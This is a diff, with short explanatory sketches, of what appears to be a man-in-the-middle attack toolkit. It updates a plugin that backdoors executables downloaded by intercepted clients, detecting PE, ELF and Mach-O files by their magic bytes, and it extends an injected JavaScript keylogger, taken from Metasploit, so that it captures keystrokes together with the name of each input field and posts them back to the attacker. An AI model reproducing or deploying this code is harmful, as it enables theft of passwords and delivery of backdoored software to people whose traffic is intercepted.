-            patchb = self.binaryGrinder(tmpFile)
-
-            if patchb:
-                bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
-                os.remove('./backdoored/' + os.path.basename(tmpFile))
-                logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
-                return {'request': request, 'data': bd_binary}
+            for bintype in ['pe','elf','fatfile','machox64','machox86']:
+                if self.bytes_have_format(data, bintype):
+                    logging.info("%s Detected supported binary type!" % client_ip)
+                    fd, tmpFile = mkstemp()
+                    with open(tmpFile, 'w') as f:
+                        f.write(data)
+
+                    patchb = self.binaryGrinder(tmpFile)
+
+                    if patchb:
+                        bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
+                        os.remove('./backdoored/' + os.path.basename(tmpFile))
+                        logging.info("%s Patching complete, forwarding to client" % client_ip)
+                        return {'request': request, 'data': bd_binary}
 
         else:
-            logging.debug("%s File is not of supported Content-Type: %s" % (request.client.getClientIP(), content_header))
+            logging.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
             return {'request': request, 'data': data}
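The handleResponse() rewrite above no longer trusts the Content-Type header alone: it sniffs the payload's magic bytes with the new bytes_have_format() helper before deciding whether the body goes to zip_files(), tar_files() or binaryGrinder(). A self-contained sketch of that check, with the magic values copied from the plugin (the sample buffers are invented):

# Standalone sketch of the magic-number check performed by the new
# bytes_have_format() helper; magic values are copied from the plugin above,
# the sample buffers are invented (Python 2, like the rest of the project).
MAGIC_NUMBERS = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
                 'pe': {'number': 'MZ', 'offset': 0},
                 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
                 'tar': {'number': 'ustar', 'offset': 257}}

def bytes_have_format(bytess, formatt):
    number = MAGIC_NUMBERS[formatt]
    return bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']

print bytes_have_format('MZ\x90\x00' + '\x00' * 60, 'pe')    # True  -> would be patched as a PE
print bytes_have_format('PK\x03\x04' + 'payload', 'zip')     # True  -> would go to zip_files()
print bytes_have_format('\x7fELF' + '\x00' * 12, 'pe')       # False -> not a PE, 'pe' check skipped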
jskeylogger plugin

@@ -2,7 +2,6 @@ from plugins.plugin import Plugin
 from plugins.Inject import Inject
 import logging
 
-
 class jskeylogger(Inject, Plugin):
     name = "Javascript Keylogger"
     optname = "jskeylogger"

@@ -13,14 +12,19 @@ class jskeylogger(Inject, Plugin):
     def initialize(self, options):
         Inject.initialize(self, options)
         self.html_payload = self.msf_keylogger()
 
         print "[*] Javascript Keylogger plugin online"
 
     def sendPostData(self, request):
         #Handle the plugin output
         if 'keylog' in request.uri:
-            keys = request.postData.split(",")
+
+            raw_keys = request.postData.split("&&")[0]
+            keys = raw_keys.split(",")
             del keys[0]; del(keys[len(keys)-1])
+
+            input_field = request.postData.split("&&")[1]
+
             nice = ''
             for n in keys:
                 if n == '9':

@@ -33,9 +37,14 @@ class jskeylogger(Inject, Plugin):
                 try:
                     nice += n.decode('hex')
                 except:
-                    logging.warning("%s ERROR decoding char %s" % (request.client.getClientIP(), n))
+                    logging.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
 
-            logging.warning("%s [%s] Keys: %s" % (request.client.getClientIP(), request.headers['host'], nice))
+            #try:
+            #    input_field = input_field.decode('hex')
+            #except:
+            #    logging.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
+
+            logging.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
 
     def msf_keylogger(self):
         #Stolen from the Metasploit module http_javascript_keylogger

@@ -43,7 +52,7 @@ class jskeylogger(Inject, Plugin):
         payload = """<script type="text/javascript">
 window.onload = function mainfunc(){
 var2 = ",";
+name = '';
 function make_xhr(){
 var xhr;
 try {

@@ -80,30 +89,59 @@ document.onkeydown = function1;
 }
 
 }
-function function2(e){
-var3 = (window.event) ? window.event.keyCode : e.which;
-var3 = var3.toString(16);
-if (var3 != "d"){
-function3(var3);
-}
-function function1(e){
-var3 = (window.event) ? window.event.keyCode : e.which;
-if (var3 == 9 || var3 == 8 || var3 == 13){
-function3(var3);
-}
+function function2(e)
+{
+srcname = window.event.srcElement.name;
+var3 = (window.event) ? window.event.keyCode : e.which;
+var3 = var3.toString(16);
+if (var3 != "d")
+{
+andxhr(var3, srcname);
+}
 }
 
-function function3(var3){
-var2 = var2 + var3 + ",";
-
-xhr.open("POST", "keylog", true);
-xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
-xhr.send(var2);
-
-if (var3 == 13 || var2.length > 3000)
-var2 = ",";
+function function1(e)
+{
+srcname = window.event.srcElement.name;
+id = window.event.srcElement.id;
+
+var3 = (window.event) ? window.event.keyCode : e.which;
+if (var3 == 9 || var3 == 8 || var3 == 13)
+{
+andxhr(var3, srcname);
+}
+else if (var3 == 0)
+{
+
+text = document.getElementById(id).value;
+if (text.length != 0)
+{
+andxhr(text.toString(16), srcname);
+}
+}
+}
+
+function andxhr(key, inputName)
+{
+if (inputName != name)
+{
+name = inputName;
+var2 = ",";
+}
+
+var2= var2 + key + ",";
+
+xhr.open("POST", "keylog", true);
+xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+xhr.send(var2 + '&&' + inputName);
+
+if (key == 13 || var2.length > 3000)
+{
+var2 = ",";
+}
 }
 </script>"""
 
         return payload
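With the payload change above, the injected keylogger now POSTs "<,hex,hex,...,>&&<input field name>" instead of a bare key list, which is what the new sendPostData() parsing expects. A hedged sketch of decoding one such request body — the sample payload and field name are invented, and the 'd' keycode (Enter) is shown literally instead of being hex-decoded:

# Hedged sketch of the new keylog POST format "<,hex,hex,...,>&&<field name>".
# The sample body and field name are invented; the parsing mirrors sendPostData().
post_data = ",68,65,6c,6c,6f,d,&&login_password"

raw_keys = post_data.split("&&")[0]
keys = raw_keys.split(",")
del keys[0]; del(keys[len(keys)-1])       # drop the empty leading/trailing entries

input_field = post_data.split("&&")[1]

nice = ''
for n in keys:
    if n == 'd':                          # hex keycode for Enter, handled specially
        nice += '<Enter>'
    else:
        nice += n.decode('hex')

print "Field: %s Keys: %s" % (input_field, nice)   # Field: login_password Keys: hello<Enter>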
Spoof plugin

@@ -20,11 +20,7 @@ from base64 import b64decode
 from urllib import unquote
 import binascii
 import random
+from configobj import ConfigObj
-try:
-    from configobj import ConfigObj
-except:
-    sys.exit('[-] configobj library not installed!')
 
 
 class Spoof(Plugin):
setup.sh

@@ -6,6 +6,7 @@ fi
 
 apt-get install python-scapy python-dns python-pip msgpack-python python-nfqueue python-imaging -y
 apt-get install python-twisted-web python-dnspython python-requests python-configobj python-pefile -y
+pip install pyyaml ua-parser user-agents
 git submodule init
 git submodule update
 cd libs/bdfactory/ && ./install.sh